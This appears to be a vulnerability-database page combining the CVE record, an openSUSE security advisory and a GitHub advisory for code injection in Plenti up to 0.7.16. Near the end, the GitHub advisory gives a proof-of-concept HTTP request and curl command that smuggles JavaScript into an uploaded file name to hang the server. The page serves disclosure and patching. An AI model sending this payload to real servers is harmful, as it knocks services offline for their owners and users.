CVE-2025-26260 (GCVE-0-2025-26260)
Vulnerability from cvelistv5
Published
2025-03-12 00:00
Modified
2025-03-19 18:59
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Plenti <= 0.7.16 is vulnerable to code execution. Users uploading '.svelte' files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-26260",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-19T18:57:58.185196Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-19T18:59:02.952Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Plenti \u003c= 0.7.16 is vulnerable to code execution. Users uploading \u0027.svelte\u0027 files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-12T15:11:08.246Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5"
},
{
"url": "https://github.com/plentico/plenti/releases/tag/v0.7.17"
},
{
"url": "https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260"
},
{
"url": "https://ahmetakan.com/2025/02/14/cve-2025-26260/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-26260",
"datePublished": "2025-03-12T00:00:00.000Z",
"dateReserved": "2025-02-07T00:00:00.000Z",
"dateUpdated": "2025-03-19T18:59:02.952Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-26260\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2025-03-12T16:15:23.907\",\"lastModified\":\"2025-03-19T19:15:46.987\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Plenti \u003c= 0.7.16 is vulnerable to code execution. Users uploading \u0027.svelte\u0027 files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution.\"},{\"lang\":\"es\",\"value\":\"Plenti \u0026lt;= 0.7.16 es vulnerable a la ejecuci\u00f3n de c\u00f3digo. Los usuarios que suben archivos \u0027.svelte\u0027 con el endpoint /postLocal pueden definir el nombre del archivo como c\u00f3digo JavaScript. El servidor ejecuta el nombre del archivo subido en el host y provoca la ejecuci\u00f3n de c\u00f3digo.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://ahmetakan.com/2025/02/14/cve-2025-26260/\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://github.com/plentico/plenti/releases/tag/v0.7.17\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-26260\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-19T18:57:58.185196Z\"}}}], \"references\": [{\"url\": \"https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5\", \"tags\": [\"exploit\"]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-19T18:58:56.687Z\"}}], \"cna\": {\"affected\": [{\"vendor\": \"n/a\", \"product\": \"n/a\", \"versions\": [{\"status\": \"affected\", \"version\": \"n/a\"}]}], \"references\": [{\"url\": \"https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5\"}, {\"url\": \"https://github.com/plentico/plenti/releases/tag/v0.7.17\"}, {\"url\": \"https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260\"}, {\"url\": \"https://ahmetakan.com/2025/02/14/cve-2025-26260/\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Plenti \u003c= 0.7.16 is vulnerable to code execution. Users uploading \u0027.svelte\u0027 files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"text\", \"description\": \"n/a\"}]}], \"providerMetadata\": {\"orgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"shortName\": \"mitre\", \"dateUpdated\": \"2025-03-12T15:11:08.246Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-26260\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-19T18:59:02.952Z\", \"dateReserved\": \"2025-02-07T00:00:00.000Z\", \"assignerOrgId\": \"8254265b-2729-46b6-b9e3-3dfca2d5bfca\", \"datePublished\": \"2025-03-12T00:00:00.000Z\", \"assignerShortName\": \"mitre\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
opensuse-su-2025:14893-1
Vulnerability from csaf_opensuse
Published
2025-03-15 00:00
Modified
2025-03-15 00:00
Summary
govulncheck-vulndb-0.0.20250313T170021-1.1 on GA media
Notes
Title of the patch
govulncheck-vulndb-0.0.20250313T170021-1.1 on GA media
Description of the patch
These are all security issues fixed in the govulncheck-vulndb-0.0.20250313T170021-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-14893
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250313T170021-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250313T170021-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-14893",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_14893-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2025:14893-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/IISU33DXNWHOYGRCT77IPABZTMARV5T6/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2025:14893-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/IISU33DXNWHOYGRCT77IPABZTMARV5T6/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-1725 page",
"url": "https://www.suse.com/security/cve/CVE-2024-1725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52812 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52812/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-1296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-1296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-26260 page",
"url": "https://www.suse.com/security/cve/CVE-2025-26260/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27403 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27403/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27616 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27616/"
}
],
"title": "govulncheck-vulndb-0.0.20250313T170021-1.1 on GA media",
"tracking": {
"current_release_date": "2025-03-15T00:00:00Z",
"generator": {
"date": "2025-03-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:14893-1",
"initial_release_date": "2025-03-15T00:00:00Z",
"revision_history": [
{
"date": "2025-03-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250313T170021-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-1725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-1725"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in the kubevirt-csi component of OpenShift Virtualization\u0027s Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node\u0027s volume by creating a custom Persistent Volume that matches the name of a worker node.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-1725",
"url": "https://www.suse.com/security/cve/CVE-2024-1725"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-1725"
},
{
"cve": "CVE-2024-52812",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52812"
}
],
"notes": [
{
"category": "general",
"text": "LF Edge eKuiper is an internet-of-things data analytics and stream processing engine. Prior to version 2.0.8, auser with rights to modify the service (e.g. kuiperUser role) can inject a cross-site scripting payload into the rule `id` parameter. Then, after any user with access to this service (e.g. admin) tries make any modifications with the rule (update, run, stop, delete), a payload acts in the victim\u0027s browser. Version 2.0.8 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52812",
"url": "https://www.suse.com/security/cve/CVE-2024-52812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52812"
},
{
"cve": "CVE-2025-1296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-1296"
}
],
"notes": [
{
"category": "general",
"text": "Nomad Community and Nomad Enterprise (\"Nomad\") are vulnerable to unintentional exposure of the workload identity token and client secret token in audit logs. This vulnerability, identified as CVE-2025-1296, is fixed in Nomad Community Edition 1.9.7 and Nomad Enterprise 1.9.7, 1.8.11, and 1.7.19.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-1296",
"url": "https://www.suse.com/security/cve/CVE-2025-1296"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-1296"
},
{
"cve": "CVE-2025-26260",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-26260"
}
],
"notes": [
{
"category": "general",
"text": "Plenti \u003c= 0.7.16 is vulnerable to code execution. Users uploading \u0027.svelte\u0027 files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-26260",
"url": "https://www.suse.com/security/cve/CVE-2025-26260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-26260"
},
{
"cve": "CVE-2025-27403",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27403"
}
],
"notes": [
{
"category": "general",
"text": "Ratify is a verification engine as a binary executable and on Kubernetes which enables verification of artifact security metadata and admits for deployment only those that comply with policies the user creates. In a Kubernetes environment, Ratify can be configured to authenticate to a private Azure Container Registry (ACR). The Azure workload identity and Azure managed identity authentication providers are configured in this setup. Users that configure a private ACR to be used with the Azure authentication providers may be impacted by a vulnerability that exists in versions prior to 1.2.3 and 1.3.2. Both Azure authentication providers attempt to exchange an Entra ID (EID) token for an ACR refresh token. However, Ratify\u0027s Azure authentication providers did not verify that the target registry is an ACR. This could have led to the EID token being presented to a non-ACR registry during token exchange. EID tokens with ACR access can potentially be extracted and abused if a user workload contains an image reference to a malicious registry. As of versions 1.2.3 and 1.3.2, the Azure workload identity and Azure managed identity authentication providers are updated to add new validation prior to EID token exchange. Validation relies upon registry domain validation against a pre-configured list of well-known ACR endpoints. EID token exchange will be executed only if at least one of the configured well-known domain suffixes (wildcard support included) matches the registry domain of the image reference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27403",
"url": "https://www.suse.com/security/cve/CVE-2025-27403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27403"
},
{
"cve": "CVE-2025-27616",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27616"
}
],
"notes": [
{
"category": "general",
"text": "Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang. Prior to versions 0.25.3 and 0.26.3, by spoofing a webhook payload with a specific set of headers and body data, an attacker could transfer ownership of a repository and its repo level secrets to a separate repository. These secrets could be exfiltrated by follow up builds to the repository. Users with an enabled repository with access to repo level CI secrets in Vela are vulnerable to the exploit, and any user with access to the CI instance and the linked source control manager can perform the exploit. Versions 0.25.3 and 0.26.3 fix the issue. No known workarounds are available.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27616",
"url": "https://www.suse.com/security/cve/CVE-2025-27616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250313T170021-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-15T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27616"
}
]
}
ghsa-mj4v-hp69-27x5
Vulnerability from github
Published
2025-02-05 21:30
Modified
2025-03-14 19:58
Severity ?
VLAI Severity ?
Summary
Plenti - Code Injection - Denial of Services
Details
Summary
While pushing a file via postLocal method if user add javascript code in file parameter that codes can exe in v8go context.
Details
While posting a file via postLocal, any attacker will add javascript codes to file parameter. That parameter content pass to componentSignature method after some validation. After that componentSignature parameter concat with ssrStr parameter.
Last part of compileSvelte function ssrStr parameter executed in v8go engine.
This cause to any one who can post a file also can push javascript code and run it. Thanks to v8go we can't use all javascript metod, if there is no any vulnerability in v8go we can't escape sandbox and can't run dangerous command like opening socket etc. But we can create infinite loop and the plenti can't response any request.
After posting a file with name 'layouts/global/test; eval(while(1););var test.svelte' we can see the ssrStr parameter include our javascript codes.
Note: Eval usage not must I just want to ensure that it's run javascript commands.
PoC
Request ``` POST /postlocal HTTP/1.1 Host: localhost:3000 Content-Length: 125 Content-Type: application/json; charset=utf-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Accept-Encoding: gzip, deflate, br Connection: keep-alive
[{"action":"create","encoding":"text","file":"layouts/global/test; eval(while(1););var test.svelte","contents":"anethole"}]
```
Video
Curl Request
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: localhost:3000' -H $'Content-Length: 125' -H $'Content-Type: application/json; charset=utf-8' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
--data-binary $'[{\"action\":\"create\",\"encoding\":\"text\",\"file\":\"layouts/global/test; eval(`while(1);`);var test.svelte\",\"contents\":\"anethole\"}]' \
$'http://localhost:3000/postlocal'
Impact
It's a remote code execution vulnerability. Because of the sandbox we can show only Denial of Service impact. Any vulnerability will be exists in v8go that cause to escape sandbox, different impacts can be show.
Note: Plenti is using V8GO and V8GO is using V8 version of 11.1.278. This version released at 25 January 2023. After this date some RCE vulnerabilities founded in V8 like CVE-2024-5830,
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.7.16"
},
"package": {
"ecosystem": "Go",
"name": "github.com/plentico/plenti"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-26260"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-05T21:30:53Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
